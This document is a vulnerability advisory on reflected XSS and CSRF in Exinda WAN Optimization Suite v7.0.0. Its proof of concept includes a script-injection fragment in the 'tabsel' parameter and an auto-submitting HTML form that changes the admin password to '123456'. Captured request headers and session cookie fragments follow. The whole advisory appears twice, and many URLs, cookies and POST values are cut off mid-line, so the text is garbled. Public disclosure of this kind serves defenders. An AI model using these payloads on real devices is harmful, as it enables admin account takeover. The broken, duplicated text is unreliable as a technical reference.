I. VULNERABILITY
-------------------------
XSS Reflected vulnerabilities and CSRF in Exinda WAN Optimization Suite
II. BACKGROUND
-------------------------
WAN Optimization Suite integrates enterprise-caliber bandwidth acceleration
and optimization with best-in-class application network visibility and
control in a single, easy-to-use suite - See more at:
III. DESCRIPTION
-------------------------
Has been detected a XSS Reflected vulnerability in Exinda Wan Optimization
"/admin/launch?script=rh&
version v7.0.0 (2160), that allows the execution of arbitrary HTML/script
code to be executed in the context of the victim user's browser. This may
allow a remote attacker to be able to forge requests that Exinda takes
action upon.
IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter “tabsel” in "
https://demo-nam-01.exinda.
users&tabsel=aaa"><script>
POC CSRF
<html>
<body onload="CSRF.submit();">
<form id="CSRF" action="https://demo-nam-
02.exinda.com:34896/admin/
users&tabsel=localusers" method="post" name="CSRF"> <input name="action10"
value="password_exinda"> </input> <input name="d_account=" value="account">
</input> <input name="t_account" value="string"> </input>
<input name="c_account" value="string"> </input> <input name="e_account"
value="true"> </input> <input name="f_account" value="admin"> </input>
<input name="d_password" value="password"> </input> <input
name="c_password" value="-"> </input>
<input name="m_password" value="false"> </input> <input name="e_password"
value="true"> </input> <input name="f_password" value="123456"> </input>
<input name="d_confirm" value="confirm"> </input> <input name="c_confirm"
value="-"> </input>
<input name="m_confirm" value="false"> </input> <input name="e_confirm"
value="true"> </input>
<input name="f_confirm" value="123456"> </input> <input name="apply"
value="Change+Password"> </input> </form>
</body>
</html>
Host=demo-nam-02.exinda.com:
User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
Gecko/20100101 Firefox/32.0
Accept=text/html,application/
Accept-Language=pt-BR,pt;q=0.
deflate Referer=https://10.0.1.120/
Cookie=resolutionconfig=today; _mkto_trk=id:316-TKO-387&
exinda.com-1411601373982-
__utma=217124611.1138601206.
__utmb=217124611.6.9.
__utmz=217124611.1411601386.1.
l)|utmcmd=referral|utmcct=/
session=IGQYEA1Jo1%2bOiMFK5%
SDPSession=
41f8f; user_email=admin; first%5flogin=false; st_index=1411531200;
et_index=1411617600; lastConfigurationPage=https%
02.exinda.com%3A34896%2Fadmin%
users%26tabsel%3Dlocalusers
Connection=keep-alive
Content-Type=application/x-
Content-Length=300
POSTDATA=action10=password_
g&c_account=string&e_account=
c_password=-
&m_password=false&e_password=
&m_confirm=false&e_confirm=
V. BUSINESS IMPACT -------------------------
Vulnerability allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser and change password of
admin user without consentiment.
VI. REQUIREMENTS
-----------------------
An Attacker needs to know the IP of the device.
An Administrator needs an authenticated connection to the device.
VII. SYSTEMS AFFECTED
-------------------------
Try Exinda WAN Optimization Suite v7.0.0 (2160)
VIII. SOLUTION
-------------------------
All parameter must be validated and use of token csrf
Authored by William Costa
-------------------------
XSS Reflected vulnerabilities and CSRF in Exinda WAN Optimization Suite
II. BACKGROUND
-------------------------
WAN Optimization Suite integrates enterprise-caliber bandwidth acceleration
and optimization with best-in-class application network visibility and
control in a single, easy-to-use suite - See more at:
III. DESCRIPTION
-------------------------
Has been detected a XSS Reflected vulnerability in Exinda Wan Optimization
"/admin/launch?script=rh&
version v7.0.0 (2160), that allows the execution of arbitrary HTML/script
code to be executed in the context of the victim user's browser. This may
allow a remote attacker to be able to forge requests that Exinda takes
action upon.
IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter “tabsel” in "
https://demo-nam-01.exinda.
users&tabsel=aaa"><script>
POC CSRF
<html>
<body onload="CSRF.submit();">
<form id="CSRF" action="https://demo-nam-
02.exinda.com:34896/admin/
users&tabsel=localusers" method="post" name="CSRF"> <input name="action10"
value="password_exinda"> </input> <input name="d_account=" value="account">
</input> <input name="t_account" value="string"> </input>
<input name="c_account" value="string"> </input> <input name="e_account"
value="true"> </input> <input name="f_account" value="admin"> </input>
<input name="d_password" value="password"> </input> <input
name="c_password" value="-"> </input>
<input name="m_password" value="false"> </input> <input name="e_password"
value="true"> </input> <input name="f_password" value="123456"> </input>
<input name="d_confirm" value="confirm"> </input> <input name="c_confirm"
value="-"> </input>
<input name="m_confirm" value="false"> </input> <input name="e_confirm"
value="true"> </input>
<input name="f_confirm" value="123456"> </input> <input name="apply"
value="Change+Password"> </input> </form>
</body>
</html>
Host=demo-nam-02.exinda.com:
User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
Gecko/20100101 Firefox/32.0
Accept=text/html,application/
Accept-Language=pt-BR,pt;q=0.
deflate Referer=https://10.0.1.120/
Cookie=resolutionconfig=today; _mkto_trk=id:316-TKO-387&
exinda.com-1411601373982-
__utma=217124611.1138601206.
__utmb=217124611.6.9.
__utmz=217124611.1411601386.1.
l)|utmcmd=referral|utmcct=/
session=IGQYEA1Jo1%2bOiMFK5%
SDPSession=
41f8f; user_email=admin; first%5flogin=false; st_index=1411531200;
et_index=1411617600; lastConfigurationPage=https%
02.exinda.com%3A34896%2Fadmin%
users%26tabsel%3Dlocalusers
Connection=keep-alive
Content-Type=application/x-
Content-Length=300
POSTDATA=action10=password_
g&c_account=string&e_account=
c_password=-
&m_password=false&e_password=
&m_confirm=false&e_confirm=
V. BUSINESS IMPACT -------------------------
Vulnerability allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser and change password of
admin user without consentiment.
VI. REQUIREMENTS
-----------------------
An Attacker needs to know the IP of the device.
An Administrator needs an authenticated connection to the device.
VII. SYSTEMS AFFECTED
-------------------------
Try Exinda WAN Optimization Suite v7.0.0 (2160)
VIII. SOLUTION
-------------------------
All parameter must be validated and use of token csrf
Authored by William Costa